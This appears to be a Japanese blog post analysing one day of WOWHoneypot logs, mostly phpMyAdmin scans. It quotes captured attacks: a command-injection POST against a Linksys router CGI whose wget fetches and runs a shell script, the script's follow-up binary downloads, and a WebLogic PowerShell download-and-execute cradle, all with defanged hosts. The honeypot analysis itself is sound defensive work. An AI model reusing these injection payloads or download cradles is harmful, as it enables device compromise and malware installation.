WOWHoneypot簡易分析(2日目)
モチベのあるうちに少しでもいいから書いていこうと思います。
6/5分のアクセスは計142アクセスでした。以下、パス別集計です。
47 [2018-06-05 /
2 [2018-06-05 /xampp/phpmyadmin/index.php
2 [2018-06-05 /www/phpMyAdmin/index.php
2 [2018-06-05 /web/phpMyAdmin/index.php
2 [2018-06-05 /typo3/phpmyadmin/index.php
2 [2018-06-05 /tools/phpMyAdmin/index.php
2 [2018-06-05 /pmd/index.php
2 [2018-06-05 /pma-old/index.php
2 [2018-06-05 /pmamy/index.php
2 [2018-06-05 /pmamy2/index.php
2 [2018-06-05 /pma/index.php
2 [2018-06-05 /PMA2/index.php
2 [2018-06-05 /phpMyAdmin/phpMyAdmin/index.php
2 [2018-06-05 /phpmyadmin/phpmyadmin/index.php
2 [2018-06-05 /phpMyAdminold/index.php
2 [2018-06-05 /phpMyAdmin.old/index.php
2 [2018-06-05 /phpmyadmin-old/index.php
2 [2018-06-05 /phpMyAdmin/index.php
2 [2018-06-05 /phpmyadmin/index.php
2 [2018-06-05 /phpMyadmin_bak/index.php
2 [2018-06-05 /phpmyadmin2/index.php
2 [2018-06-05 /phpmyadmin1/index.php
2 [2018-06-05 /phpmyadmin0/index.php
2 [2018-06-05 /phpma/index.php
2 [2018-06-05 /phpadmin/index.php
2 [2018-06-05 /mysql/index.php
2 [2018-06-05 /mysqladmin/index.php
2 [2018-06-05 /mysql-admin/index.php
2 [2018-06-05 /myadmin/index.php
2 [2018-06-05 /myadmin2/index.php
2 [2018-06-05 /index.php
2 [2018-06-05 /hndUnblock.cgi
2 [2018-06-05 /HNAP1/
2 [2018-06-05 /getcfg.php
2 [2018-06-05 /db/index.php
2 [2018-06-05 /dbadmin/index.php
2 [2018-06-05 /claroline/phpMyAdmin/index.php
2 [2018-06-05 /authentication.cgi?captcha=&dummy=0000000000000
2 [2018-06-05 /admin/PMA/index.php
2 [2018-06-05 /admin/pma/index.php
2 [2018-06-05 /admin/phpMyAdmin/index.php
2 [2018-06-05 /admin/phpmyadmin/index.php
2 [2018-06-05 /admin/phpmyadmin2/index.php
2 [2018-06-05 /admin/mysql/index.php
2 [2018-06-05 /admin/mysql2/index.php
2 [2018-06-05 /admin/index.php
1 [2018-06-05 /xxbb
1 [2018-06-05 /wls-wsat/CoordinatorPortType
1 [2018-06-05 /webfig/roteros.info
1 [2018-06-05 /moo
1 [2018-06-05 /ccvv
内容的には、PhpMyAdminを狙ったものが多いです。よくある感じです。
また、デフォルトの設定のままハンティングだけを有効にしておいたところ、早速、1件ありました。
186.205.92[.]89 wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh
この内容が含まれるアクセスには以下が含まれていました。
POST /hndUnblock.cgi HTTP/1.1
User-Agent: Wget(linux)
submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;rm -f nmlt1.sh;wget -O nmlt1.sh hxxp://domstates[.]su/nmlt1.sh;chmod +x nmlt1.sh;./nmlt1.sh`&StartEPI=1
このパスはCisco Linksysというワイヤレスルータを狙ったもののようです。
取得されるものは以下です。
このシェルスクリプト内で更に別のファイル3つを同じドメインから取得するようです。
wget -O .nttpd hxxp://domstates[.]su/.nttpd,21-mips-le-t1
wget -O .nttpd-z hxxp://domstates[.]su/.nttpd,21-arm-le-t1-z
wget -O .nttpd-z hxxp://domstates[.]su/.nttpd,21-mips-be-t2-z
なお、今回の解析にあたっては以下のサイトを参考にさせていただきました。
また、よくログを見てみたら、weblogicの脆弱性を狙ったものも1つ混ざっています。
1 [2018-06-05 /wls-wsat/CoordinatorPortType
内容を確認すると、webshellの埋め込みと思われるものです。よく見ます。
Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E $OS=(GWmi Win32_OperatingSystem).Caption;$WC=New-Object Net.WebClient;$WC.Headers['User-Agent']="PowerShell/WL $OS";IEX $WC.DownloadString('hxxp://120.25.148[.]202/images/test/DL.php');